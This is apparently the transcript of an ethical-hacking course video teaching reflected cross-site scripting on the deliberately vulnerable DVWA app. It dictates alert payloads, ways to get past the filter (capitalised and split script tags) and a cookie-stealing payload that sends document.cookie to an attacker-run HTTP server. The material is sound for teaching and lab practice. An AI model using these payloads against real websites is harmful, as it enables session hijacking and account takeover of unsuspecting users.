Welcome back, I want to talk about another vulnerability that we mentioned in the theory video, and that is cross site scripting. If you remember, this is a vulnerability where we execute code due to poor user input filtering. In this attack, it is not the server that is getting targeted, but the users that visit that website. There are three main types of XSS attack: there is reflected XSS, stored XSS and DOM based XSS, and in this course we will be covering the first two, which are reflected and stored XSS. But before we do that, let's quickly remind ourselves of a scenario as to how this attack looks like. So the attacker finds an XSS vulnerability. They inject JavaScript code that they want the target to execute inside of their browsers. And then anyone who visits that Web page will execute the JavaScript code that you injected. This is an example of stored XSS where the victim doesn't have to click on any links, all they need to do is to visit the same page on their own and they will execute that script that you injected. So how does this work? Well, this is possible only in case the script that you injected is getting stored on the server. This will most likely be, for example, a page where you need to type in some type of a comment. And then that comment will show on that page.
If that comment input is vulnerable, then you most likely will have a stored XSS because anyone loading that page after that will load your comment as well. And if your comment was JavaScript code, they will execute that code. So what does this mean? Well, this means once you inject it, it will stay on the server and the server will host that page with malicious JavaScript code to anyone trying to visit it. On the other hand, reflected XSS is a little bit different, it won't work on anyone that visits the page. It will only work if you send a link with malicious code to someone. In this scenario, the server doesn't store our injected code on their site, so it won't be hosting the page with our code. However, the code injection vulnerability could still exist. If we find it, then we would craft our JavaScript code that we want victims to execute and we would send those links to anyone that we want. Once they click on the link and open the website page, our JavaScript code will also get executed. Now, these types of attacks are usually used for session stealing or by attackers to mine on target PCs and create a botnet. But our goal is to just find the bug itself and we will demonstrate how cookie stealing works later. Let's get straight into it. OK, so the thing that we need is our DVWA running.
I got it already up and we also need Burp Suite, make sure that you have Burp Suite running with intercept turned off. And once you do all of that, you want to navigate to the XSS reflected right here, because this is the first example of XSS that we are going to cover in this video. Another thing that you want to do is you want to set the security level to be low for our first example. And let's give it a try to figure out whether this even has an XSS vulnerability. So what does this application do? Well, here, it asks us to input our name. So I will just go and type here, Aleksa, inside of this input just to see what happens. So if I click on submit. OK, so it prints out hello, Aleksa, what a welcoming application, right, and this right here is an example of how it should work. You type in your name, it will welcome you with hello and then your name. However, what happens once we try to inject JavaScript code, the most simple JavaScript code, and what we usually do first when hunting for XSS is type this code. So let me go in terminal just so you can see it better. So this arrow to the left, then script, arrow to the right, alert, and inside of the brackets we put one between single quotes, or you can actually put anything you want, and you close the script tag. And this right here is JavaScript code.
It tells the page to alert us with number one. And once again, you can specify anything between these quotes. So what does this mean? This means it will open that small popup window at the top of the page where it should print out one. And these script tags right here are just a way for us to tell the Web page, hey, anything that's inside of these script tags you should read as JavaScript code and not HTML code. And this at the end is just the closing script tag, which is telling the Web page: here is where the JavaScript code ends. This alert is a JavaScript function that will alert whatever is inside of these brackets, so let's give it a try and let's input this inside of our user input instead of a name. I copy it, go to my page and paste it right here. So script, alert and closing script, I click on Submit. And here it is, we have an XSS vulnerability since it ran our code and it opened this small window, we can see it says one, which is what we alerted. Well, this was pretty easy since this was in low settings, we can assume no user input was filtered. Therefore, we managed to execute this. And as easy as this looks, there are many, many pages that are currently on the Internet that are vulnerable to this type of bug, even with this simple script.
And as harmless as this looks, it can be used to do some serious damage on the client side, depending on what exactly you send them as JavaScript code. Let me show you what I mean, what you would do after actually finding the XSS vulnerability: you would copy the link with the JavaScript code that you injected and anyone that clicks on the link... So I will just simulate here someone clicking on the link. They click on the link that you send. They press enter. They will also execute that JavaScript code, as we can see right here. They will also get a pop up window that says one. And this is a reflected cross site scripting attack. Anyone that opens this link will also execute this. They do not have to type the JavaScript code themselves. Now that we did this, let us also take a quick look at the source code of this page. So I will open the source. And here is the code for this specific page. And they just paste our input right here. They don't perform any filtering whatsoever. Now that we covered the low security level, let's try to find XSS in the medium security level to see if it works.
So we'll close this, go to DVWA Security and I will change from low to medium, click on submit, and this will change everything to medium. So let's go back to XSS reflected and let's first type the name to see whether it gives the same output, and it does, it prints out Hello and then the name. So now let's try the same script that we did with the low security. So open script tag, alert one, and I will close the script tag, click on submit. Hmmm, it seems that they actually remove the script tags, we can only see right here: Hello, alert one, and it doesn't give us a pop up window that says one. What this means is there is some type of filtering performed on this page, because we don't get that window and our code doesn't get executed. By the output of our application, we can assume that the filtering performs removing of script tags, and usually this is the type of filtering that you will encounter. Why? Well, because script tags automatically mean to the Web page that JavaScript code is coming through. Some Web pages perform filtering just by removing these script tags. But let's see whether they filter it well enough. They seem to have filtered script like this, but have they filtered script like this? What if I write it in capital letters? Will that also be filtered?
Let's give it a try. If I type the script and then alert, and I also close the script with capital letters, click on Submit. And here it is, we got it to run once again, so all we had to do was write script in capital letters. They only filtered out lower case script. Let's make sure that that is the case by going and visiting the source code and let's see what they did. And here it is inside the print statement. They use the string replace function on the script tag and replaced it with an empty string. And that is the reason why in the first example we didn't get the script printed out. We only got one printed out, since they removed our script tags. But we managed to bypass this with capital script letters. But what would happen if they, for example, also filtered the capital script letters? Well, then we could do something like this. We could type, and let me write it first in terminal, just so you can see it better. We could write something like this: scr, and then open another left arrow, script, close right arrow, and then ipt, close another right arrow, alert one, and close the script tag. And the reason why we are writing script like this is because our Web page only filters the opening script tag. It only filters this.
It doesn't filter the closing script tag. So what did we do right here? Why would this work? Well, before I explain it, let me first give it a try on the Web page just to see if it would work. And it does indeed work. So what we essentially did right here is we split this script tag into two pieces, and what the Web page does, it only filters out the entire script tag. So what the Web page would do is it would see this opening bracket, then script and closing bracket. It would remove it, but then we would still be left with a script. So if I go right here and let's pretend that we're the Web page: we will filter out the opening script. So let's remove this. And what do we get? Well, we get another opening script tag that won't be removed, and that is why this would work as well. Great. Now let's see the attack where we steal cookies from the person that visits our link. Those cookies could then be used to steal their session and possibly enter their online account on that website, if the website session management is also poor. Right now, we will see only how to get that cookie with cross site scripting. So to do this, we must first see where we are going to receive the cookie value, so they will execute the code and our code will extract a cookie.
But where is it going to send it? For this, we're going to start a small Python HTTP server that we will send the cookie to. To show how to do that, well, we can go inside of our terminal and just type the command python dash m. And then SimpleHTTPServer and then the port number where we want to host it, let's say port number eight thousand. If I press enter, this will start the server on all interfaces on port eight thousand. Then the malicious JavaScript code that we want to inject is this right here. I will first write it in another terminal and then we're going to paste it inside of the page. So we must first start with capital script because we are on medium level. The regular script won't work. Then we can type document dot write, open brackets, then type one single quote, open another left arrow and image source equals open double quotes, http:// and then the IP address of our Linux machine, and then the port on which we are running that Python server, which in my case is eight thousand. Then we can add another closing single quote after it, add a plus and then document dot cookie. After that, space and another plus, and after that comes single quote, space, double quote, close right arrow, another single quote, close bracket, dot and comma, and then the closing script tag. OK, I know what you're thinking. What even is this?
And this can be a little bit challenging for someone who never encountered JavaScript before. However, this is just JavaScript syntax. It's just a programming language. And after a few times trying XSS, you will pretty much get used to it. And it won't be that weird looking once you write it. Since I assume that for anyone that hasn't encountered this before, this looks pretty terrible. But what we are essentially doing right here is we are opening script tags in capital letters because of the filtering on our page. And then we are writing the document dot cookie, which is the session cookie of the user visiting that page and running this code, and sending that to the IP address on port eight thousand, since that is where we are running our Python server. And here we should get printed out the session cookie ID once someone visits our link with this JavaScript code. And at the end, all we are doing is we're closing the script tag. So let's give it a try and paste this in our user input. Copy it once again, go to our page and type it here, and I press enter or submit. Well, nothing seems to happen right here, but if I go to my Web server, here it is, here is our target cookie. Here is an ID and that is the cookie value.
It even tells right here that we got the security on medium, and this is something that we might be able to use to steal their session. However, more about that later. For now, we saw how to find the XSS vulnerability in both the low and the medium security level. As I said, this can be one of the most challenging parts of the course. However, if there is anything you don't quite get, feel free to post the question so we can clarify it even more and make it understandable. Great. In the next video, we're going to do this same vulnerability, just we're going to see how it would look like if it was stored XSS. Remember, this that we covered is called reflected XSS, and the target will only execute the code if they open the link with our JavaScript code. In the next video, we'll see the vulnerability where the JavaScript code gets stored on the server itself.